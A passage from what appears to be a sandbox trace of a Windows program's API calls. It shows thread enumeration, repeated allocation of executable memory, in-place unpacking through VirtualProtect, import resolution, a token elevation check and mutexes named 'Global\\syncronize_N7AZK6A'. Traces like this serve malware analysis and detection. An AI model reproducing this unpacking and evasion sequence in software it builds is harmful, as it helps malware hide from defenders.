(hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.862] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.862] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.863] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.864] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.864] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.865] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.866] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.866] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.867] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.868] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.868] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.869] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.870] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.870] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.871] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.872] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.872] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.873] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.874] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.875] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.875] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.876] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.877] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.877] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.878] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.879] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.880] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.880] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.881] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.882] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.882] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.883] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.884] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.884] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.885] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.886] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.887] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.887] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.888] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.889] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.889] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.890] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.891] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.891] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.892] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.893] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.894] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.894] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.895] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.896] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.896] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.897] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.898] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.898] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.899] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.900] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.900] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.901] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.902] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.902] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.903] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.904] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.905] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.905] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.906] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.907] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.907] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.908] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.909] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.909] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.910] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.911] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.911] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.912] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.913] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.913] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.914] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.915] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.916] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.916] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.917] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.918] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.919] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.919] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.920] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.920] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.921] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.922] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.922] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.923] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.924] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.925] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.925] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.926] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.927] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.927] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.928] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.929] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.930] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.930] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.931] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.932] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.932] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.933] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.934] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.934] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.935] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.936] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.936] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.937] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.938] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.938] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.939] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.940] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.940] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.941] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.942] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.942] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.943] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.944] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.944] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.945] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.946] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.947] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.947] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.951] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.952] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.952] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.953] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.954] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.954] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.955] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.956] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.956] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0189.171] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa28) returned 0x308 [0189.171] NtQueryInformationThread (in: ThreadHandle=0x308, ThreadInformationClass=0x9, ThreadInformation=0x19df80, ThreadInformationLength=0x4, ReturnLength=0x0 | out: ThreadInformation=0x19df80, ReturnLength=0x0) returned 0x0 [0189.239] CloseHandle (hObject=0x308) returned 1 [0189.239] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf0) returned 0x308 [0189.239] NtQueryInformationThread (in: ThreadHandle=0x308, ThreadInformationClass=0x9, ThreadInformation=0x19df80, ThreadInformationLength=0x4, ReturnLength=0x0 | out: ThreadInformation=0x19df80, ReturnLength=0x0) returned 0x0 [0189.239] CloseHandle (hObject=0x308) returned 1 [0189.240] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdf8) returned 0x308 [0189.240] NtQueryInformationThread (in: ThreadHandle=0x308, ThreadInformationClass=0x9, ThreadInformation=0x19df80, ThreadInformationLength=0x4, ReturnLength=0x0 | out: ThreadInformation=0x19df80, ReturnLength=0x0) returned 0x0 [0189.240] CloseHandle (hObject=0x308) returned 1 [0189.243] CloseHandle (hObject=0x300) returned 1 [0189.243] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0189.248] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.261] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.263] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.275] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.277] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.288] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.291] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.302] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.305] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.316] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.318] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.329] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.343] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.345] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.357] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.358] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.368] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.370] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.379] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.381] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.391] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.393] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.402] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.404] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.413] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.415] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.424] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.426] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.435] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.437] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.446] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.447] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.458] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.460] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.469] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.471] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.480] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.482] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.490] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.493] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.502] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.504] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.513] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.515] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.524] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.526] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.534] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.536] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.545] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.547] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.557] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.559] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.567] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.569] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.578] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.581] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0189.590] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.593] GetSystemTime (in: lpSystemTime=0x19df80 | out: lpSystemTime=0x19df80*(wYear=0x7e3, wMonth=0x5, wDayOfWeek=0x3, wDay=0xf, wHour=0x0, wMinute=0x1a, wSecond=0x3a, wMilliseconds=0x334)) [0189.593] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x2) returned 1 [0189.594] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.594] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.594] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.594] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.594] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.595] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.595] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.595] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.595] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.596] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.596] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.596] VirtualProtect (in: lpAddress=0x40c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.596] VirtualProtect (in: lpAddress=0x40d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.596] VirtualProtect (in: lpAddress=0x40e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.597] VirtualProtect (in: lpAddress=0x40f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.597] VirtualProtect (in: lpAddress=0x410000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.597] VirtualProtect (in: lpAddress=0x411000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.597] VirtualProtect (in: lpAddress=0x412000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.598] VirtualProtect (in: lpAddress=0x413000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.598] VirtualProtect (in: lpAddress=0x414000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.598] VirtualProtect (in: lpAddress=0x415000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.598] VirtualProtect (in: lpAddress=0x416000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.598] VirtualProtect (in: lpAddress=0x417000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.599] VirtualProtect (in: lpAddress=0x418000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19df58 | out: lpflOldProtect=0x19df58*=0x20) returned 1 [0189.603] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75e90000 [0189.603] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcAddress") returned 0x75ea51b0 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="LoadLibraryA") returned 0x75ea5a80 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForSingleObject") returned 0x75efeca0 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75efebb0 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="LeaveCriticalSection") returned 0x77bfb250 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="EnterCriticalSection") returned 0x77bfb2d0 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="ReleaseMutex") returned 0x75efec20 [0189.604] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0189.604] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19df68 | out: lpflOldProtect=0x19df68*=0x40) returned 1 [0189.605] VirtualProtect (in: lpAddress=0x401000, dwSize=0x9c25, flNewProtect=0x20, lpflOldProtect=0x19df68 | out: lpflOldProtect=0x19df68*=0x40) returned 1 [0189.605] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x2636, flNewProtect=0x2, lpflOldProtect=0x19df68 | out: lpflOldProtect=0x19df68*=0x40) returned 1 [0189.605] VirtualProtect (in: lpAddress=0x40e000, dwSize=0xaad5, flNewProtect=0x4, lpflOldProtect=0x19df68 | out: lpflOldProtect=0x19df68*=0x40) returned 1 [0189.621] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x601430 [0189.621] QueryPerformanceCounter (in: lpPerformanceCount=0x19ddec | out: lpPerformanceCount=0x19ddec*=18432709218) returned 1 [0189.621] GetTickCount () returned 0x2cfe8 [0189.621] GetCurrentProcessId () returned 0x6d8 [0189.622] GetTickCount () returned 0x2cfe8 [0189.622] GetTickCount () returned 0x2cfe8 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x601548 [0189.623] GetVersion () returned 0x23f00206 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7) returned 0x60d170 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606890 [0189.623] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606890, Size=0x20) returned 0x601250 [0189.623] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601250, Size=0x40) returned 0x60ad20 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2323cd8 [0189.623] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_N7AZK6A") returned 0x0 [0189.623] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_N7AZK6A") returned 0x314 [0189.623] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d170 | out: hHeap=0x5e0000) returned 1 [0189.623] lstrlenW (lpString="Global\\syncronize_") returned 18 [0189.623] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ad20 | out: hHeap=0x5e0000) returned 1 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7) returned 0x60d0f0 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606848 [0189.623] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606848, Size=0x20) returned 0x6015e8 [0189.623] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6015e8, Size=0x40) returned 0x60b1e8 [0189.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2333ce0 [0189.624] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_N7AZK6U") returned 0x0 [0189.624] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_N7AZK6U") returned 0x318 [0189.624] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d0f0 | out: hHeap=0x5e0000) returned 1 [0189.624] lstrlenW (lpString="Global\\syncronize_") returned 18 [0189.624] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60b1e8 | out: hHeap=0x5e0000) returned 1 [0189.624] GetVersion () returned 0x23f00206 [0189.624] GetCurrentProcess () returned 0xffffffff [0189.624] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19ddd8 | out: TokenHandle=0x19ddd8*=0x31c) returned 1 [0189.624] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x14, TokenInformation=0x19ddd4, TokenInformationLength=0x4, ReturnLength=0x19dde0 | out: TokenInformation=0x19ddd4, ReturnLength=0x19dde0) returned 1 [0189.624] CloseHandle (hObject=0x31c) returned 1 [0189.624] WaitForSingleObject (hHandle=0x318, dwMilliseconds=0x0) returned 0x0 [0189.624] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x3e8) returned 0x0 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc138 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606740 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606740, Size=0x20) returned 0x601458 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601458, 